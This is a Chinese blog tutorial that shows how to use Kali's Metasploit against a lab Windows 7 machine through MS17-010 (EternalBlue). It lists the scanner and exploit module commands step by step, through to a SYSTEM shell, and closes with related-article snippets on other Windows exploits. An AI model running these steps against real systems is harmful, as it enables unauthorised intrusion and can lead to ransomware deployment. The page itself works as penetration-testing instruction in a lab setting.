kali利用永恒之蓝攻击win7

最新推荐文章于 2024-05-31 07:23:48 发布
最新推荐文章于 2024-05-31 07:23:48 发布
阅读量1.8w 收藏 149
点赞数 26
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sievr/article/details/104265379
版权

kali机:192.168.198.134
win7:192.168.198.138
照常来查看一下自己的IP地址
在这里插入图片描述
在这里插入图片描述
接下来就是配置靶机的环境
1.网络连接方式选择公用网络
在这里插入图片描述
2.关闭公用网络的防火墙(否则ping不通靶机)
在这里插入图片描述
现在可以离开win7了
打开我们最可爱的kali,启动我们的msfconsole小可爱
在这里插入图片描述
(msfconsole都是爱你的样子哟)
好的我们来搜索一下永恒之蓝在msf中的编号

search ms17_010 -->搜索msfconsole内所有关于ms17_010的东西

在这里插入图片描述
请看1号选手:

auxiliary/scanner/smb/smb_ms17_010 -->探测永恒之蓝漏洞模块

我们首先用这个命令来探测目标机器是否有永恒之蓝漏洞(当然你不探测也没有关系)

use auxiliary/scanner/smb/smb_ms17_010 -->使用这个模块
show options -->查看所需哪些参数

在这里插入图片描述
我们可以看到RHOSTS和RPORT对应的yes,意为所需的参数
RPORT是445端口,不用管。但RHOSTS是空的,所以我们来设置一下

set RSHOSTS 192.168.198.138 -->设置靶机的主机地址

填好之后就可以开始攻击了

exploit -->攻击

在这里插入图片描述
请看倒数第5排,他给你的解释是:

Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)

译:这个主机可能存在ms17_010漏洞,也就是永恒之蓝漏洞

既然有漏洞了,那么我们开始吧
可是要怎么开始呢
大家还记得上面的search ms17_010么,移步图6,找到我们的2号选手

exploit/windows/smb/ms17_010_eternalblue -->永恒之蓝攻击模块
use exploit/windows/smb/ms17_010_eternalblue -->使用永恒之蓝攻击模块

在这里插入图片描述
老方法,查看所需参数:show options
在这里插入图片描述
设置RHOSTS参数并攻击

set RHOSTS 192.168.198.138 -->设置靶机的主机地址
exploit -->攻击

在这里插入图片描述
当出现最下面WIN字眼时,证明你已经攻击成功了
它是不会动的,你千万不要以为它卡住了哦
你得按一下回车,就会进入cmd模式了
在这里插入图片描述
查看自己的权限,是系统权限

好的,下面上传勒索软件我就不讲了,我们就以拿到系统权限为目的

还是老话,有什么不懂的欢迎私信
如果我有哪点没讲清楚的,欢迎评论

sievr
关注
  • 26
    点赞
  • 149
    收藏
    觉得还不错? 一键收藏
  • 19
    评论
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
kali攻防第12章 Metasploit之服务器蓝屏攻击
热门推荐
安全参透之旅
12-24 1万+
Metasploit之服务器蓝屏攻击   准备工具 1、kali 系统 IP:10.10.10.131 2、受害者机子 IP: 10.10.10.130 3、工具 Metasploit 4、服务器开启3389端口   步骤: 1、进入Metasploit控制台 root@kali:~# msfconsole
Kali 永恒之蓝(最基础的攻击指令),程序员进阶
m0_60607397的博客
04-05 313
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
最新发布
dzqxwzoe的博客
05-31 1042
永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
网络安全笔记
qq_43409114的博客
02-26 7040
第三章 信息收集和网络扫描 枚举服务 枚举是一类程序,允许用户从一个网络中收集某一类的相关系;DNS枚举可以帮助用户收集如用户名,计算机名,IP地址等,可以使用DNSenum工具。要进行SNMP枚举,用户需要使用SnmpEnum工具,,允许用户分析网络内部SNMP信息传输。 whois工具 可以用来查询域名注册信息,也可以进行信息反查 子域名查询 www.searchdns.netcraft.com DNS区域传送 指的是一台备用服务器使用主服务器刷新自己的域,这为允许中的DNS服务提供了一定的冗余度,其目
MS12-020 windows RDP协议 漏洞利用(蓝屏)
凝聚力安全团队
11-13 1501
目录漏洞描述影响版本漏洞检测工具kaliwindows漏洞利用漏洞加固 漏洞描述    远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。    远程桌面协议服务允许远程攻击者通过一系列精心设计的数据包,导致出现拒绝服务漏洞。 影响版本 Windows XP Service Pack 3 Windows XP Professional
异常处理与函数
weixin_44253823的博客
12-18 393
异常处理 try/except用于处理异常,在正在运行的程序或脚本的上下文环境中处理错误。 try: print("[+] 1337/0 ="+str(1337/0)) except: print("[-] Error.") 可以将异常的报错消息储存到变量e中,以便方便其打印出来,同时需要显示式的将变量e转换成一个字符串。 try: print("[+] 1337/1 = "+s...
kali入侵win7(转载)
m0_56071898的博客
05-04 5684
前言: 本文的目的并不是教会学者入侵win7主机, 而是被入侵之后怎么反制并且做好下一步的防范 以及查到攻击者的蛛丝马迹 攻击原理: 利用未修复永恒之蓝的445端口漏洞入侵目标主机 演示设备: 主机 IP kali Linux 10.11.4.3 Windows7 10.11.4.152 (win7条件为无防火墙,无杀软) 攻击前准备: 扫描目标网段 扫描目标IP 使用msf工具的aux模块来测试目标是否能被正常攻击 1.1)--->扫描目标网段
永恒之蓝测试.docx
07-23
"Kali 永恒之蓝测试指南" 在这篇文章中,我们将详细介绍 Kali Linux 中的永恒之蓝测试步骤,适合新手观看。永恒之蓝是 Windows 操作系统中的一个漏洞,通过这个漏洞,可以远程控制目标主机。 Nmap 扫描 首先,...
渗透基础笔记+作业(永恒之蓝复现)
09-08
复现环境通常包括攻击机(如Kali Linux)和靶机(如Windows 7)。工具如Nmap用于网络扫描,Metasploit则作为渗透框架,利用已知漏洞进行攻击。在复现过程中,测试者会模拟攻击流程,以理解漏洞的利用方式和防范措施...
永恒之蓝配置Windows7
10-24
本文将讲解如何使用 Kali Linux 中的 MSF-Metasploit 来利用永恒之蓝漏洞入侵 Windows7 系统。 一、准备工作 在开始之前,我们需要准备好攻击机和靶机。攻击机使用 Kali Linux 操作系统,IP 地址为 192.168.1.10,...
永恒之蓝漏洞演示
12-22
利用kali linux在windows7上演示永恒之蓝漏洞,有kali实战经验的可以看懂
Python安全攻防-3渗透测试框架
快吃小蛋糕吧的博客
11-23 2173
最近新买了一本关于Python的一本书《Python安全攻防渗透测试实战指南》,这本书出自MS08067安全实验室,才学到第三章,虽然书中有非常多的低级语法错误,但是总体来讲还是值得一学的。 Pocsuite框架: 这里书中有对Pocsuite框架有基本的介绍,这里就不重复了,只需要知道这是一款基于漏洞与POC的远程漏洞验证框架即可。 安装: 通过git克隆代码仓库 git clone https://github.com/knownsec/pocsuite3.git 克隆完成后,仓库结构大概是这样的.
kali利用ms17-010漏洞实现win7系统入侵
2301_77296801的博客
10-12 1752
MS17-010漏洞是在2017年5月份由NSA泄露出来的一个漏洞,该漏洞影响了微软Windows操作系统中的SMBv1协议,攻击者可通过该漏洞远程执行代码,从而控制目标系统。此漏洞被称为“永恒之蓝”(EternalBlue)。攻击者可以利用该漏洞构造恶意SMB数据包,直接向目标系统发送攻击代码,从而远程控制目标系统。攻击者可以利用该漏洞传播恶意代码,建立僵尸网络,进行勒索软件攻击等,下面进行该攻击的教学。在这里我们以Windows虚拟机作为漏洞靶机,在Kali Linux中运行攻击命令。1、点击。
kali利用CVE_2019_0708(远程桌面代码执行漏洞)攻击win7
sievr的博客
02-13 1万+
一、漏洞说明 2019年5月15日微软发布安全补丁修复了CVE编号为CVE-2019-0708的Windows远程桌面服务(RDP)远程代码执行漏洞,该漏洞在不需身份认证的情况下即可远程触发,危害与影响面极大。 目前,9月7日EXP代码已被公开发布至metasploit-framework的Pull requests中,经测试已经可以远程代码执行。 二、影响版本 Windows 7 Windows...
渗透测试靶机实战---系统篇02
一杯咖啡的渗透记忆
10-12 2088
(续)渗透测试靶机实战---01 3.OS End Of Life Detection (系统寿命终止漏洞) root@kali:~# telnet 192.168.10.149 Trying 192.168.10.149... Connected to 192.168.10.149. Escape character is '^]'. _ ...
msf反弹shell成功,却无法建立会话处理办法
yang1234567898的博客
01-07 4939
报错:Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444). 如果run的时候出现以下问题导致建立会话失败,可能是端口4444被占用了, 在终端输入 “netstat -tulpen”,查看进程端口信息 通过命令”fuser -k 端口号/tcp“,删除4444端口进程 ...
【网络安全】MS17-010“永恒之蓝”漏洞的利用
qq_45748133的博客
01-06 1万+
导语 最近学期末进行网络安全实训,老师要求每个小组选择一个方向进行研究,本篇将讲述“永恒之蓝”漏洞的简单利用。 一、实验原理 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,电脑只要开机,攻击者就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 二、实验环境 三、实验记录 一次渗透的基本步骤 (1)启动kali虚机,进入root权限打开Metasploit渗透工具。 msfco
kali永恒之蓝渗透win8
04-28
针对Win8系统的渗透测试,可以使用Kali Linux中的永恒之蓝(EternalBlue)漏洞进行攻击。以下是一些步骤: 1. 首先,需要在Kali Linux中安装Metasploit框架,Metasploit是一款渗透测试工具,可以用来探测和利用漏洞。 2. 接着,使用Metasploit框架中的“eternalblue_doublepulsar”模块,该模块可以利用永恒之蓝漏洞攻击Win8系统。 3. 在攻击之前,需要获取Win8系统的IP地址,可以使用nmap等端口扫描工具进行扫描获取。 4. 利用Metasploit框架中的“eternalblue_doublepulsar”模块,输入Win8系统的IP地址,然后开始攻击。 5. 如果攻击成功,可以获取Win8系统的权限,并且可以执行命令,比如获取敏感信息、远程控制系统等。 需要注意的是,进行渗透测试需要遵守法律法规,严禁对未授权的系统进行攻击

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 19
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值